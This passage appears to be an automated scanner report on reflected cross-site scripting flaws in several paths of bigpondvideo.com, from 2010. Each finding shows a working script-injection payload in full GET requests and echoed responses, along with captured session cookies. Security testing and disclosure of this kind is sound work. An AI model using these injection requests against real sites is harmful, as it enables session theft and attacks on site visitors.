HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:07:46 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... m/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3002d8ed6&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Newsbfc57</script><script>alert(1)</script>694f5b478ee&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.463. http://bigpondvideo.com/NewsOnDemandEntertainment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemandEntertainment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb827</script><script>alert(1)</script>46fb0153270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandEntertainment/?fb827</script><script>alert(1)</script>46fb0153270=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:54 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=942c5f5c8f5b3da1d6e3cdfed6f0acc9; path=/ Content-Type: text/html Connection: close Content-Length: 58342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b96205e9&platform=Production&phpSessionId=942c5f5c8f5b3da1d6e3cdfed6f0acc9&fb827</script><script>alert(1)</script>46fb0153270=1&navId=704&channelTitle=Entertainment&targetLevel=Videos.News.Entertainment&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57d3</script><script>alert(1)</script>b9c0124a6dd was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandEntertainment/?ref=Net-Head-TV-Ente57d3</script><script>alert(1)</script>b9c0124a6dd HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:02 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... om/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3012e09b4&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Ente57d3</script><script>alert(1)</script>b9c0124a6dd&navId=704&channelTitle=Entertainment&targetLevel=Videos.News.Entertainment&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.465. http://bigpondvideo.com/NewsOnDemandFinance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemandFinance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e938b</script><script>alert(1)</script>5e101fe150b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandFinance/?e938b</script><script>alert(1)</script>5e101fe150b=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:53 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=ba03828817ea1b532ee5cc4ecc43bc65; path=/ Content-Type: text/html Connection: close Content-Length: 58312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b957a987&platform=Production&phpSessionId=ba03828817ea1b532ee5cc4ecc43bc65&e938b</script><script>alert(1)</script>5e101fe150b=1&navId=715&channelTitle=Finance&targetLevel=Videos.News.Finance&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf7c</script><script>alert(1)</script>283b9928e99 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandFinance/?ref=Net-Head-TV-Financeadf7c</script><script>alert(1)</script>283b9928e99 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:02 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... o/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30125b173&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Financeadf7c</script><script>alert(1)</script>283b9928e99&navId=715&channelTitle=Finance&targetLevel=Videos.News.Finance&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.467. http://bigpondvideo.com/NewsOnDemandNational/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemandNational/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10f9a</script><script>alert(1)</script>9beb4d90696 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandNational/?10f9a</script><script>alert(1)</script>9beb4d90696=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:53 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=d0e2a66649427d16f425d25b6d51f124; path=/ Content-Type: text/html Connection: close Content-Length: 58317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b957253d&platform=Production&phpSessionId=d0e2a66649427d16f425d25b6d51f124&10f9a</script><script>alert(1)</script>9beb4d90696=1&navId=703&channelTitle=National&targetLevel=Videos.News.National&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c5b</script><script>alert(1)</script>baea64c11b3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandNational/?ref=Net-Head-TV-Natlf1c5b</script><script>alert(1)</script>baea64c11b3 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:07:53 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... m/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb300907234&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Natlf1c5b</script><script>alert(1)</script>baea64c11b3&navId=703&channelTitle=National&targetLevel=Videos.News.National&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.469. http://bigpondvideo.com/NewsOnDemandOddspot/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemandOddspot/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65a0c</script><script>alert(1)</script>b2299813f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandOddspot/?65a0c</script><script>alert(1)</script>b2299813f32=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:07 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30175eebc&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&65a0c</script><script>alert(1)</script>b2299813f32=1&navId=714&channelTitle=Odd Spot&targetLevel=Videos.News.Odd Spot&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0da1</script><script>alert(1)</script>2b73934eb66 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandOddspot/?ref=Net-Head-TV-OddSpotc0da1</script><script>alert(1)</script>2b73934eb66 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:01 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... o/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3011ba74b&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-OddSpotc0da1</script><script>alert(1)</script>2b73934eb66&navId=714&channelTitle=Odd Spot&targetLevel=Videos.News.Odd Spot&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.471. http://bigpondvideo.com/NewsOnDemandWorld/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemandWorld/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 887a8</script><script>alert(1)</script>9959919f7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandWorld/?887a8</script><script>alert(1)</script>9959919f7ba=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:52 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=aef6bad49586c834fc1eb54a9352cf0c; path=/ Content-Type: text/html Connection: close Content-Length: 58302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b94d27af&platform=Production&phpSessionId=aef6bad49586c834fc1eb54a9352cf0c&887a8</script><script>alert(1)</script>9959919f7ba=1&navId=707&channelTitle=World&targetLevel=Videos.News.World&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e602</script><script>alert(1)</script>e322c28e644 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemandWorld/?ref=Net-Head-TV-World2e602</script><script>alert(1)</script>e322c28e644 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:07:57 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb300de0974&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-World2e602</script><script>alert(1)</script>e322c28e644&navId=707&channelTitle=World&targetLevel=Videos.News.World&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.473. http://bigpondvideo.com/Sport/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Sport/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b87f</script><script>alert(1)</script>6cfbb4de69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sport/?6b87f</script><script>alert(1)</script>6cfbb4de69=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:17 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3021ab3f4&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&6b87f</script><script>alert(1)</script>6cfbb4de69=1&navId=4&channelTitle=Sport&targetLevel=Videos.Sport.All Sports&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b074</script><script>alert(1)</script>4642806e51f was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Sport/?ref=Net-Head-TV-Sport6b074</script><script>alert(1)</script>4642806e51f HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:17 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30225382c&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport6b074</script><script>alert(1)</script>4642806e51f&navId=4&channelTitle=Sport&targetLevel=Videos.Sport.All Sports&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.475. http://bigpondvideo.com/Top_Music_Videos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Top_Music_Videos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b12</script><script>alert(1)</script>62d50b7abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Top_Music_Videos/?f3b12</script><script>alert(1)</script>62d50b7abda=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:53 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=3cf760cb2bf3187ae4a65139b6cdb670; path=/ Content-Type: text/html Connection: close Content-Length: 58328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b9572550&platform=Production&phpSessionId=3cf760cb2bf3187ae4a65139b6cdb670&f3b12</script><script>alert(1)</script>62d50b7abda=1&navId=442&channelTitle=Top Videos&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca4fd</script><script>alert(1)</script>361f33e72d3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Top_Music_Videos/?ref=Net-Head-TV-MusicVODca4fd</script><script>alert(1)</script>361f33e72d3 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:11 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58350
